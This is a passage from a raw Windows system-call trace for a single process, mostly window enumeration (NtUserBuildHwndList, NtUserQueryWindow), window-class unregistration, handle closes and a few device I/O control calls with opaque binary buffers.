 02988   748   NtUnmapViewOfSection  (-1, 0xfe0000, ... ) == 0x0
 02989   748   NtClose  (200, ... ) == 0x0
 02990   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0xc,}, 4, ... ) == 0x0
 02991   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0xd,}, 4, ... ) == 0x0
 02992   748   NtClose  (176, ... ) == 0x0
 02993   748   NtClose  (172, ... ) == 0x0
 02994   748   NtClose  (180, ... ) == 0x0
 02995   748   NtUserGetAtomName  (49211, 1241332, ... ) == 0xf
 02996   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 02997   748   NtUserGetAtomName  (49213, 1241332, ... ) == 0xd
 02998   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 02999   748   NtUserGetAtomName  (49215, 1241332, ... ) == 0x10
 03000   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03001   748   NtUserGetAtomName  (49217, 1241332, ... ) == 0x12
 03002   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03003   748   NtUserGetAtomName  (49219, 1241332, ... ) == 0xd
 03004   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03005   748   NtUserGetAtomName  (49221, 1241332, ... ) == 0xb
 03006   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03007   748   NtUserGetAtomName  (49223, 1241332, ... ) == 0xf
 03008   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03009   748   NtUserGetAtomName  (49225, 1241332, ... ) == 0xd
 03010   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03011   748   NtUserGetAtomName  (49227, 1241332, ... ) == 0x11
 03012   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03013   748   NtUserGetAtomName  (49229, 1241332, ... ) == 0xf
 03014   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03015   748   NtUserGetAtomName  (49231, 1241332, ... ) == 0x11
 03016   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03017   748   NtUserGetAtomName  (49233, 1241332, ... ) == 0xf
 03018   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03019   748   NtUserGetAtomName  (49235, 1241332, ... ) == 0xc
 03020   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03021   748   NtUserGetAtomName  (49237, 1241324, ... ) == 0xd
 03022   748   NtUserUnregisterClass  (1241384, 2000486400, 1241372, ... ) == 0x1
 03023   748   NtUserGetAtomName  (49239, 1241324, ... ) == 0x11
 03024   748   NtUserUnregisterClass  (1241384, 2000486400, 1241372, ... ) == 0x1
 03025   748   NtUserGetAtomName  (49241, 1241332, ... ) == 0xc
 03026   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03027   748   NtUserGetAtomName  (49243, 1241332, ... ) == 0xe
 03028   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03029   748   NtUserGetAtomName  (49245, 1241332, ... ) == 0x8
 03030   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03031   748   NtUserGetAtomName  (49247, 1241332, ... ) == 0xd
 03032   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03033   748   NtUserGetAtomName  (49175, 1241332, ... ) == 0x6
 03034   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03035   748   NtUserGetAtomName  (49177, 1241332, ... ) == 0x6
 03036   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03037   748   NtUserGetAtomName  (49176, 1241332, ... ) == 0x4
 03038   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03039   748   NtUserGetAtomName  (49178, 1241332, ... ) == 0x7
 03040   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03041   748   NtUserGetAtomName  (49180, 1241332, ... ) == 0x8
 03042   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03043   748   NtUserGetAtomName  (49182, 1241332, ... ) == 0x9
 03044   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03045   748   NtUserGetAtomName  (49179, 1241324, ... ) == 0x9
 03046   748   NtUserUnregisterClass  (1241384, 2000486400, 1241372, ... ) == 0x1
 03047   748   NtUserGetAtomName  (49256, 1241332, ... ) == 0x7
 03048   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03049   748   NtUserGetAtomName  (49258, 1241332, ... ) == 0xd
 03050   748   NtUserUnregisterClass  (1241392, 2000486400, 1241380, ... ) == 0x1
 03051   748   NtUnmapViewOfSection  (-1, 0xff0000, ... ) == 0x0
 03052   748   NtDeviceIoControlFile  (112, 116, 0x0, 0x12f218, 0x22415c,  (112, 116, 0x0, 0x12f218, 0x22415c, "U\4\376\14\272\223\15D\243\376U9s\320\267#x\0\0\0\0\0\0\0\10 \335\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "U\4\376\14\272\223\15D\243\376U9s\320\267#x\0\0\0\0\0\0\0\10 \335\0\306\205\337w", ) , 32, 32, ... {status=0x0, info=32},  (112, 116, 0x0, 0x12f218, 0x22415c, "U\4\376\14\272\223\15D\243\376U9s\320\267#x\0\0\0\0\0\0\0\10 \335\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "U\4\376\14\272\223\15D\243\376U9s\320\267#x\0\0\0\0\0\0\0\10 \335\0\306\205\337w", ) , ) == 0x0
 03053   748   NtDeviceIoControlFile  (112, 116, 0x0, 0x12f1e0, 0x228168,  (112, 116, 0x0, 0x12f1e0, 0x228168, "x\0\0\0\0\0\0\0", 8, 0, ... {status=0x0, info=0}, 0x0, ) , 8, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0
 03054   748   NtDeviceIoControlFile  (112, 116, 0x0, 0x12f218, 0x22415c,  (112, 116, 0x0, 0x12f218, 0x22415c, "\254\253\177yX{\226G\271$\325\21x\245\234\344\220\0\0\0\0\0\0\0\10 \335\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "\254\253\177yX{\226G\271$\325\21x\245\234\344\220\0\0\0\0\0\0\0\10 \335\0\306\205\337w", ) , 32, 32, ... {status=0x0, info=32},  (112, 116, 0x0, 0x12f218, 0x22415c, "\254\253\177yX{\226G\271$\325\21x\245\234\344\220\0\0\0\0\0\0\0\10 \335\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "\254\253\177yX{\226G\271$\325\21x\245\234\344\220\0\0\0\0\0\0\0\10 \335\0\306\205\337w", ) , ) == 0x0
 03055   748   NtDeviceIoControlFile  (112, 116, 0x0, 0x12f1e0, 0x228168,  (112, 116, 0x0, 0x12f1e0, 0x228168, "\220\0\0\0\0\0\0\0", 8, 0, ... {status=0x0, info=0}, 0x0, ) , 8, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0
 03056   748   NtWaitForSingleObject  (236, 0, 0x0, ... ) == 0x0
 03057   748   NtClearEvent  (236, ... ) == 0x0
 03058   748   NtSetEvent  (236, ... 0x0, ) == 0x0
 03059   748   NtClose  (236, ... ) == 0x0
 03060   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0x8,}, 4, ... ) == 0x0
 03061   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0x9,}, 4, ... ) == 0x0
 03062   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0xa,}, 4, ... ) == 0x0
 03063   748   NtClose  (100, ... ) == 0x0
 03064   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0x7,}, 4, ... ) == 0x0
 03065   748   NtUnmapViewOfSection  (-1, 0xa70000, ... ) == 0x0
 03066   748   NtClose  (60, ... ) == 0x0
 03067   748   NtGdiDeleteObjectApp  (1913653144, ... ) == 0x1
 03068   748   NtUserGetProcessWindowStation  (... ) == 0x1c
 03069   748   NtUserBuildNameList  (28, 522, 1333448, 1241576, ... ) == 0x0
 03070   748   NtUserGetProcessWindowStation  (... ) == 0x1c
 03071   748   NtUserOpenDesktop  ({24, 28, 0x40, 0, 0,  ({24, 28, 0x40, 0, 0, "Default"}, 1, 0x41, ... ) }, 1, 0x41, ... ) == 0x3c
 03072   748   NtUserBuildHwndList  (60, 0, 0, 0, 64, ... (0x5009e, 0x400fa, 0x10074, 0x10080, 0x10070, 0x10084, 0x30048, 0x10072, 0x20052, 0x5009c, 0x10090, 0x500a2, 0x100d0, 0x200b0, 0x100cc, 0x70104, 0x70100, 0x20118, 0x3014c, 0x1011c, 0x100e6, 0x100d6, 0x100d2, 0x100ca, 0x100c8, 0x100ba, 0x100ae, 0x100ac, 0x300a6, 0x10078, 0x30062, 0x50036, 0x5005c, 0x100be, 0x400fe, 0x10092, 0x10086, 0x40034, 0x50050, 0x1013c, 0x10120, 0x100c2, 0x100bc, 0x2014e, 0x100d8, 0x100b6, 0x100b8, 0x100b4, 0x100c0, 0x1009a, 0x5005e, 0x1, ), 52, ) == 0x0
 03073   748   NtUserValidateHandleSecure  (327838, ... ) == 0x1
 03074   748   NtUserQueryWindow  (327838, 0, ... ) == 0x6b8
 03075   748   NtUserQueryWindow  (327838, 1, ... ) == 0x6d4
 03076   748   NtUserValidateHandleSecure  (327838, ... ) == 0x1
 03077   748   NtUserValidateHandleSecure  (262394, ... ) == 0x1
 03078   748   NtUserQueryWindow  (262394, 0, ... ) == 0x6b8
 03079   748   NtUserQueryWindow  (262394, 1, ... ) == 0x6d4
 03080   748   NtUserValidateHandleSecure  (262394, ... ) == 0x1
 03081   748   NtUserBuildHwndList  (0, 262394, 1, 0, 64, ... (0x80064, 0x60068, 0x6006c, 0x50094, 0x50096, 0x60066, 0x7006a, 0x90058, 0x6006e, 0x5008a, 0x50088, 0x500a0, 0x1, ), 13, ) == 0x0
 03082   748   NtUserValidateHandleSecure  (524388, ... ) == 0x1
 03083   748   NtUserQueryWindow  (524388, 0, ... ) == 0x6b8
 03084   748   NtUserQueryWindow  (524388, 1, ... ) == 0x6d4
 03085   748   NtUserValidateHandleSecure  (393320, ... ) == 0x1
 03086   748   NtUserQueryWindow  (393320, 0, ... ) == 0x6b8
 03087   748   NtUserQueryWindow  (393320, 1, ... ) == 0x6d4
 03088   748   NtUserValidateHandleSecure  (393324, ... ) == 0x1
 03089   748   NtUserQueryWindow  (393324, 0, ... ) == 0x6b8
 03090   748   NtUserQueryWindow  (393324, 1, ... ) == 0x6d4
 03091   748   NtUserValidateHandleSecure  (327828, ... ) == 0x1
 03092   748   NtUserQueryWindow  (327828, 0, ... ) == 0x6b8
 03093   748   NtUserQueryWindow  (327828, 1, ... ) == 0x6d4
 03094   748   NtUserValidateHandleSecure  (327830, ... ) == 0x1
 03095   748   NtUserQueryWindow  (327830, 0, ... ) == 0x6b8
 03096   748   NtUserQueryWindow  (327830, 1, ... ) == 0x6d4
 03097   748   NtUserValidateHandleSecure  (393318, ... ) == 0x1
 03098   748   NtUserQueryWindow  (393318, 0, ... ) == 0x6b8
 03099   748   NtUserQueryWindow  (393318, 1, ... ) == 0x6d4
 03100   748   NtUserValidateHandleSecure  (458858, ... ) == 0x1
 03101   748   NtUserQueryWindow  (458858, 0, ... ) == 0x6b8
 03102   748   NtUserQueryWindow  (458858, 1, ... ) == 0x6d4
 03103   748   NtUserValidateHandleSecure  (589912, ... ) == 0x1
 03104   748   NtUserQueryWindow  (589912, 0, ... ) == 0x6b8
 03105   748   NtUserQueryWindow  (589912, 1, ... ) == 0x6d4
 03106   748   NtUserValidateHandleSecure  (393326, ... ) == 0x1
 03107   748   NtUserQueryWindow  (393326, 0, ... ) == 0x6b8
 03108   748   NtUserQueryWindow  (393326, 1, ... ) == 0x6d4
 03109   748   NtUserValidateHandleSecure  (327818, ... ) == 0x1
 03110   748   NtUserQueryWindow  (327818, 0, ... ) == 0x6b8
 03111   748   NtUserQueryWindow  (327818, 1, ... ) == 0x6d4
 03112   748   NtUserValidateHandleSecure  (327816, ... ) == 0x1
 03113   748   NtUserQueryWindow  (327816, 0, ... ) == 0x6b8
 03114   748   NtUserQueryWindow  (327816, 1, ... ) == 0x6d4
 03115   748   NtUserValidateHandleSecure  (327840, ... ) == 0x1
 03116   748   NtUserQueryWindow  (327840, 0, ... ) == 0x6b8
 03117   748   NtUserQueryWindow  (327840, 1, ... ) == 0x6d4
 03118   748   NtUserValidateHandleSecure  (65652, ... ) == 0x1
 03119   748   NtUserQueryWindow  (65652, 0, ... ) == 0x6b8
 03120   748   NtUserQueryWindow  (65652, 1, ... ) == 0x6d4
 03121   748   NtUserValidateHandleSecure  (65652, ... ) == 0x1
 03122   748   NtUserValidateHandleSecure  (65664, ... ) == 0x1
 03123   748   NtUserQueryWindow  (65664, 0, ... ) == 0x6b8
 03124   748   NtUserQueryWindow  (65664, 1, ... ) == 0x6d4
 03125   748   NtUserValidateHandleSecure  (65664, ... ) == 0x1
 03126   748   NtUserValidateHandleSecure  (65648, ... ) == 0x1
 03127   748   NtUserQueryWindow  (65648, 0, ... ) == 0x6b8
 03128   748   NtUserQueryWindow  (65648, 1, ... ) == 0x6d4
 03129   748   NtUserValidateHandleSecure  (65648, ... ) == 0x1
 03130   748   NtUserValidateHandleSecure  (65668, ... ) == 0x1
 03131   748   NtUserQueryWindow  (65668, 0, ... ) == 0x6b8
 03132   748   NtUserQueryWindow  (65668, 1, ... ) == 0x6d4
 03133   748   NtUserValidateHandleSecure  (65668, ... ) == 0x1
 03134   748   NtUserValidateHandleSecure  (196680, ... ) == 0x1
 03135   748   NtUserQueryWindow  (196680, 0, ... ) == 0x6b8
 03136   748   NtUserQueryWindow  (196680, 1, ... ) == 0x6d4
 03137   748   NtUserValidateHandleSecure  (196680, ... ) == 0x1
 03138   748   NtUserValidateHandleSecure  (65650, ... ) == 0x1
 03139   748   NtUserQueryWindow  (65650, 0, ... ) == 0x6b8
 03140   748   NtUserQueryWindow  (65650, 1, ... ) == 0x6d4
 03141   748   NtUserValidateHandleSecure  (65650, ... ) == 0x1
 03142   748   NtUserValidateHandleSecure  (131154, ... ) == 0x1
 03143   748   NtUserQueryWindow  (131154, 0, ... ) == 0x6b8
 03144   748   NtUserQueryWindow  (131154, 1, ... ) == 0x6d4
 03145   748   NtUserValidateHandleSecure  (131154, ... ) == 0x1
 03146   748   NtUserBuildHwndList  (0, 131154, 1, 0, 64, ... (0x3003e, 0x3003c, 0x30040, 0x30042, 0x30044, 0x30046, 0x10076, 0x10082, 0x1007a, 0x1007e, 0x1, ), 11, ) == 0x0
 03147   748   NtUserValidateHandleSecure  (196670, ... ) == 0x1
 03148   748   NtUserQueryWindow  (196670, 0, ... ) == 0x6b8
 03149   748   NtUserQueryWindow  (196670, 1, ... ) == 0x6d4
 03150   748   NtUserValidateHandleSecure  (196668, ... ) == 0x1
 03151   748   NtUserQueryWindow  (196668, 0, ... ) == 0x6b8
 03152   748   NtUserQueryWindow  (196668, 1, ... ) == 0x6d4
 03153   748   NtUserValidateHandleSecure  (196672, ... ) == 0x1
 03154   748   NtUserQueryWindow  (196672, 0, ... ) == 0x6b8
 03155   748   NtUserQueryWindow  (196672, 1, ... ) == 0x6d4
 03156   748   NtUserValidateHandleSecure  (196674, ... ) == 0x1
 03157   748   NtUserQueryWindow  (196674, 0, ... ) == 0x6b8
 03158   748   NtUserQueryWindow  (196674, 1, ... ) == 0x6d4
 03159   748   NtUserValidateHandleSecure  (196676, ... ) == 0x1
 03160   748   NtUserQueryWindow  (196676, 0, ... ) == 0x6b8
 03161   748   NtUserQueryWindow  (196676, 1, ... ) == 0x6d4
 03162   748   NtUserValidateHandleSecure  (196678, ... ) == 0x1
 03163   748   NtUserQueryWindow  (196678, 0, ... ) == 0x6b8
 03164   748   NtUserQueryWindow  (196678, 1, ... ) == 0x6d4
 03165   748   NtUserValidateHandleSecure  (65654, ... ) == 0x1
 03166   748   NtUserQueryWindow  (65654, 0, ... ) == 0x6b8
 03167   748   NtUserQueryWindow  (65654, 1, ... ) == 0x6d4
 03168   748   NtUserValidateHandleSecure  (65666, ... ) == 0x1
 03169   748   NtUserQueryWindow  (65666, 0, ... ) == 0x6b8
 03170   748   NtUserQueryWindow  (65666, 1, ... ) == 0x6d4
 03171   748   NtUserValidateHandleSecure  (65658, ... ) == 0x1
 03172   748   NtUserQueryWindow  (65658, 0, ... ) == 0x6b8
 03173   748   NtUserQueryWindow  (65658, 1, ... ) == 0x6d4
 03174   748   NtUserValidateHandleSecure  (65662, ... ) == 0x1
 03175   748   NtUserQueryWindow  (65662, 0, ... ) == 0x6b8
 03176   748   NtUserQueryWindow  (65662, 1, ... ) == 0x6d4
 03177   748   NtUserValidateHandleSecure  (327836, ... ) == 0x1
 03178   748   NtUserQueryWindow  (327836, 0, ... ) == 0x6b8
 03179   748   NtUserQueryWindow  (327836, 1, ... ) == 0x6d4
 03180   748   NtUserValidateHandleSecure  (327836, ... ) == 0x1
 03181   748   NtUserValidateHandleSecure  (65680, ... ) == 0x1
 03182   748   NtUserQueryWindow  (65680, 0, ... ) == 0x6b8
 03183   748   NtUserQueryWindow  (65680, 1, ... ) == 0x6bc
 03184   748   NtUserValidateHandleSecure  (65680, ... ) == 0x1
 03185   748   NtUserValidateHandleSecure  (327842, ... ) == 0x1
 03186   748   NtUserQueryWindow  (327842, 0, ... ) == 0x6b8
 03187   748   NtUserQueryWindow  (327842, 1, ... ) == 0x6d4
 03188   748   NtUserValidateHandleSecure  (327842, ... ) == 0x1
 03189   748   NtUserValidateHandleSecure  (65744, ... ) == 0x1
 03190   748   NtUserQueryWindow  (65744, 0, ... ) == 0x19c
 03191   748   NtUserQueryWindow  (65744, 1, ... ) == 0x1a0
 03192   748   NtUserValidateHandleSecure  (65744, ... ) == 0x1
 03193   748   NtUserValidateHandleSecure  (131248, ... ) == 0x1
 03194   748   NtUserQueryWindow  (131248, 0, ... ) == 0xa0
 03195   748   NtUserQueryWindow  (131248, 1, ... ) == 0xe4
 03196   748   NtUserValidateHandleSecure  (131248, ... ) == 0x1
 03197   748   NtUserValidateHandleSecure  (65740, ... ) == 0x1
 03198   748   NtUserQueryWindow  (65740, 0, ... ) == 0x19c
 03199   748   NtUserQueryWindow  (65740, 1, ... ) == 0x1a0
 03200   748   NtUserValidateHandleSecure  (65740, ... ) == 0x1
 03201   748   NtUserValidateHandleSecure  (459012, ... ) == 0x1
 03202   748   NtUserQueryWindow  (459012, 0, ... ) == 0x49c
 03203   748   NtUserQueryWindow  (459012, 1, ... ) == 0x180
 03204   748   NtUserValidateHandleSecure  (459012, ... ) == 0x1
 03205   748   NtUserValidateHandleSecure  (459008, ... ) == 0x1
 03206   748   NtUserQueryWindow  (459008, 0, ... ) == 0x5e8
 03207   748   NtUserQueryWindow  (459008, 1, ... ) == 0x1dc
 03208   748   NtUserValidateHandleSecure  (459008, ... ) == 0x1
 03209   748   NtUserValidateHandleSecure  (131352, ... ) == 0x1
 03210   748   NtUserQueryWindow  (131352, 0, ... ) == 0x6ac
 03211   748   NtUserQueryWindow  (131352, 1, ... ) == 0x7f4
 03212   748   NtUserValidateHandleSecure  (131352, ... ) == 0x1
 03213   748   NtUserValidateHandleSecure  (196940, ... ) == 0x1
 03214   748   NtUserQueryWindow  (196940, 0, ... ) == 0x4b4
 03215   748   NtUserQueryWindow  (196940, 1, ... ) == 0x474
 03216   748   NtUserValidateHandleSecure  (196940, ... ) == 0x1
 03217   748   NtUserValidateHandleSecure  (65820, ... ) == 0x1
 03218   748   NtUserQueryWindow  (65820, 0, ... ) == 0x22c
 03219   748   NtUserQueryWindow  (65820, 1, ... ) == 0x220
 03220   748   NtUserValidateHandleSecure  (65820, ... ) == 0x1
 03221   748   NtUserValidateHandleSecure  (65766, ... ) == 0x1
 03222   748   NtUserQueryWindow  (65766, 0, ... ) == 0x6b8
 03223   748   NtUserQueryWindow  (65766, 1, ... ) == 0x13c
 03224   748   NtUserValidateHandleSecure  (65766, ... ) == 0x1
 03225   748   NtUserValidateHandleSecure  (65750, ... ) == 0x1
 03226   748   NtUserQueryWindow  (65750, 0, ... ) == 0x6b8
 03227   748   NtUserQueryWindow  (65750, 1, ... ) == 0x13c
 03228   748   NtUserValidateHandleSecure  (65750, ... ) == 0x1
 03229   748   NtUserBuildHwndList  (0, 65750, 1, 0, 64, ... (0x100da, 0x100dc, 0x100de, 0x100e0, 0x1, ), 5, ) == 0x0
 03230   748   NtUserValidateHandleSecure  (65754, ... ) == 0x1
 03231   748   NtUserQueryWindow  (65754, 0, ... ) == 0x6b8
 03232   748   NtUserQueryWindow  (65754, 1, ... ) == 0x13c
 03233   748   NtUserValidateHandleSecure  (65756, ... ) == 0x1
 03234   748   NtUserQueryWindow  (65756, 0, ... ) == 0x6b8
 03235   748   NtUserQueryWindow  (65756, 1, ... ) == 0x13c
 03236   748   NtUserValidateHandleSecure  (65758, ... ) == 0x1
 03237   748   NtUserQueryWindow  (65758, 0, ... ) == 0x6b8
 03238   748   NtUserQueryWindow  (65758, 1, ... ) == 0x13c
 03239   748   NtUserValidateHandleSecure  (65760, ... ) == 0x1
 03240   748   NtUserQueryWindow  (65760, 0, ... ) == 0x6b8
 03241   748   NtUserQueryWindow  (65760, 1, ... ) == 0x13c
 03242   748   NtUserValidateHandleSecure  (65746, ... ) == 0x1
 03243   748   NtUserQueryWindow  (65746, 0, ... ) == 0x6b8
 03244   748   NtUserQueryWindow  (65746, 1, ... ) == 0x6d4
 03245   748   NtUserValidateHandleSecure  (65746, ... ) == 0x1
 03246   748   NtUserValidateHandleSecure  (65738, ... ) == 0x1
 03247   748   NtUserQueryWindow  (65738, 0, ... ) == 0x19c
 03248   748   NtUserQueryWindow  (65738, 1, ... ) == 0x1a0
 03249   748   NtUserValidateHandleSecure  (65738, ... ) == 0x1
 03250   748   NtUserValidateHandleSecure  (65736, ... ) == 0x1
 03251   748   NtUserQueryWindow  (65736, 0, ... ) == 0xa0
 03252   748   NtUserQueryWindow  (65736, 1, ... ) == 0xe4
 03253   748   NtUserValidateHandleSecure  (65736, ... ) == 0x1
 03254   748   NtUserValidateHandleSecure  (65722, ... ) == 0x1
 03255   748   NtUserQueryWindow  (65722, 0, ... ) == 0x104
 03256   748   NtUserQueryWindow  (65722, 1, ... ) == 0x108
 03257   748   NtUserValidateHandleSecure  (65722, ... ) == 0x1
 03258   748   NtUserValidateHandleSecure  (65710, ... ) == 0x1
 03259   748   NtUserQueryWindow  (65710, 0, ... ) == 0x104
 03260   748   NtUserQueryWindow  (65710, 1, ... ) == 0x108
 03261   748   NtUserValidateHandleSecure  (65710, ... ) == 0x1
 03262   748   NtUserValidateHandleSecure  (65708, ... ) == 0x1
 03263   748   NtUserQueryWindow  (65708, 0, ... ) == 0x120
 03264   748   NtUserQueryWindow  (65708, 1, ... ) == 0x124
 03265   748   NtUserValidateHandleSecure  (65708, ... ) == 0x1
 03266   748   NtUserValidateHandleSecure  (196774, ... ) == 0x1
 03267   748   NtUserQueryWindow  (196774, 0, ... ) == 0xc4
 03268   748   NtUserQueryWindow  (196774, 1, ... ) == 0xc8
 03269   748   NtUserValidateHandleSecure  (196774, ... ) == 0x1
 03270   748   NtUserValidateHandleSecure  (65656, ... ) == 0x1
 03271   748   NtUserQueryWindow  (65656, 0, ... ) == 0x6b8
 03272   748   NtUserQueryWindow  (65656, 1, ... ) == 0x6ec
 03273   748   NtUserValidateHandleSecure  (65656, ... ) == 0x1
 03274   748   NtUserValidateHandleSecure  (196706, ... ) == 0x1
 03275   748   NtUserQueryWindow  (196706, 0, ... ) == 0x6b8
 03276   748   NtUserQueryWindow  (196706, 1, ... ) == 0x6bc
 03277   748   NtUserValidateHandleSecure  (196706, ... ) == 0x1
 03278   748   NtUserValidateHandleSecure  (327734, ... ) == 0x1
 03279   748   NtUserQueryWindow  (327734, 0, ... ) == 0x6b8
 03280   748   NtUserQueryWindow  (327734, 1, ... ) == 0x6bc
 03281   748   NtUserValidateHandleSecure  (327734, ... ) == 0x1
 03282   748   NtUserValidateHandleSecure  (327772, ... ) == 0x1
 03283   748   NtUserQueryWindow  (327772, 0, ... ) == 0x6b8
 03284   748   NtUserQueryWindow  (327772, 1, ... ) == 0x6bc
 03285   748   NtUserValidateHandleSecure  (327772, ... ) == 0x1
 03286   748   NtUserValidateHandleSecure  (65726, ... ) == 0x1
 03287   748   NtUserQueryWindow  (65726, 0, ... ) == 0x19c
 03288   748   NtUserQueryWindow  (65726, 1, ... ) == 0x1a0
 03289   748   NtUserValidateHandleSecure  (65726, ... ) == 0x1
 03290   748   NtUserValidateHandleSecure  (262398, ... ) == 0x1
 03291   748   NtUserQueryWindow  (262398, 0, ... ) == 0x6b8
 03292   748   NtUserQueryWindow  (262398, 1, ... ) == 0x6d4
 03293   748   NtUserValidateHandleSecure  (262398, ... ) == 0x1
 03294   748   NtUserValidateHandleSecure  (65682, ... ) == 0x1
 03295   748   NtUserQueryWindow  (65682, 0, ... ) == 0x6b8
 03296   748   NtUserQueryWindow  (65682, 1, ... ) == 0x6bc
 03297   748   NtUserValidateHandleSecure  (65682, ... ) == 0x1
 03298   748   NtUserValidateHandleSecure  (65670, ... ) == 0x1
 03299   748   NtUserQueryWindow  (65670, 0, ... ) == 0x6b8
 03300   748   NtUserQueryWindow  (65670, 1, ... ) == 0x6bc
 03301   748   NtUserValidateHandleSecure  (65670, ... ) == 0x1
 03302   748   NtUserBuildHwndList  (0, 65670, 1, 0, 64, ... (0x1008c, 0x1008e, 0x1, ), 3, ) == 0x0
 03303   748   NtUserValidateHandleSecure  (65676, ... ) == 0x1
 03304   748   NtUserQueryWindow  (65676, 0, ... ) == 0x6b8
 03305   748   NtUserQueryWindow  (65676, 1, ... ) == 0x6bc
 03306   748   NtUserValidateHandleSecure  (65678, ... ) == 0x1
 03307   748   NtUserQueryWindow  (65678, 0, ... ) == 0x6b8
 03308   748   NtUserQueryWindow  (65678, 1, ... ) == 0x6bc
 03309   748   NtUserValidateHandleSecure  (262196, ... ) == 0x1
 03310   748   NtUserQueryWindow  (262196, 0, ... ) == 0x6b8
 03311   748   NtUserQueryWindow  (262196, 1, ... ) == 0x6d4
 03312   748   NtUserValidateHandleSecure  (262196, ... ) == 0x1
 03313   748   NtUserValidateHandleSecure  (327760, ... ) == 0x1
 03314   748   NtUserQueryWindow  (327760, 0, ... ) == 0x6b8
 03315   748   NtUserQueryWindow  (327760, 1, ... ) == 0x6d4
 03316   748   NtUserValidateHandleSecure  (327760, ... ) == 0x1
 03317   748   NtUserValidateHandleSecure  (65852, ... ) == 0x1
 03318   748   NtUserQueryWindow  (65852, 0, ... ) == 0x22c
 03319   748   NtUserQueryWindow  (65852, 1, ... ) == 0x220
 03320   748   NtUserValidateHandleSecure  (65852, ... ) == 0x1
 03321   748   NtUserValidateHandleSecure  (65824, ... ) == 0x1
 03322   748   NtUserQueryWindow  (65824, 0, ... ) == 0x22c
 03323   748   NtUserQueryWindow  (65824, 1, ... ) == 0x220
 03324   748   NtUserValidateHandleSecure  (65824, ... ) == 0x1
 03325   748   NtUserValidateHandleSecure  (65730, ... ) == 0x1
 03326   748   NtUserQueryWindow  (65730, 0, ... ) == 0xa0
 03327   748   NtUserQueryWindow  (65730, 1, ... ) == 0xe4
 03328   748   NtUserValidateHandleSecure  (65730, ... ) == 0x1
 03329   748   NtUserValidateHandleSecure  (65724, ... ) == 0x1
 03330   748   NtUserQueryWindow  (65724, 0, ... ) == 0xa0
 03331   748   NtUserQueryWindow  (65724, 1, ... ) == 0xe4
 03332   748   NtUserValidateHandleSecure  (65724, ... ) == 0x1
 03333   748   NtUserValidateHandleSecure  (131406, ... ) == 0x1
 03334   748   NtUserQueryWindow  (131406, 0, ... ) == 0x4b4
 03335   748   NtUserQueryWindow  (131406, 1, ... ) == 0x474
 03336   748   NtUserValidateHandleSecure  (131406, ... ) == 0x1
 03337   748   NtUserValidateHandleSecure  (65752, ... ) == 0x1
 03338   748   NtUserQueryWindow  (65752, 0, ... ) == 0x6b8
 03339   748   NtUserQueryWindow  (65752, 1, ... ) == 0x13c
 03340   748   NtUserValidateHandleSecure  (65752, ... ) == 0x1
 03341   748   NtUserValidateHandleSecure  (65718, ... ) == 0x1
 03342   748   NtUserQueryWindow  (65718, 0, ... ) == 0x104
 03343   748   NtUserQueryWindow  (65718, 1, ... ) == 0x108
 03344   748   NtUserValidateHandleSecure  (65718, ... ) == 0x1
 03345   748   NtUserValidateHandleSecure  (65720, ... ) == 0x1
 03346   748   NtUserQueryWindow  (65720, 0, ... ) == 0x120
 03347   748   NtUserQueryWindow  (65720, 1, ... ) == 0x124
 03348   748   NtUserValidateHandleSecure  (65720, ... ) == 0x1
 03349   748   NtUserValidateHandleSecure  (65716, ... ) == 0x1
 03350   748   NtUserQueryWindow  (65716, 0, ... ) == 0xc4
 03351   748   NtUserQueryWindow  (65716, 1, ... ) == 0xc8
 03352   748   NtUserValidateHandleSecure  (65716, ... ) == 0x1
 03353   748   NtUserValidateHandleSecure  (65728, ... ) == 0x1
 03354   748   NtUserQueryWindow  (65728, 0, ... ) == 0x19c
 03355   748   NtUserQueryWindow  (65728, 1, ... ) == 0x1a0
 03356   748   NtUserValidateHandleSecure  (65728, ... ) == 0x1
 03357   748   NtUserValidateHandleSecure  (65690, ... ) == 0x1
 03358   748   NtUserQueryWindow  (65690, 0, ... ) == 0x6b8
 03359   748   NtUserQueryWindow  (65690, 1, ... ) == 0x6bc
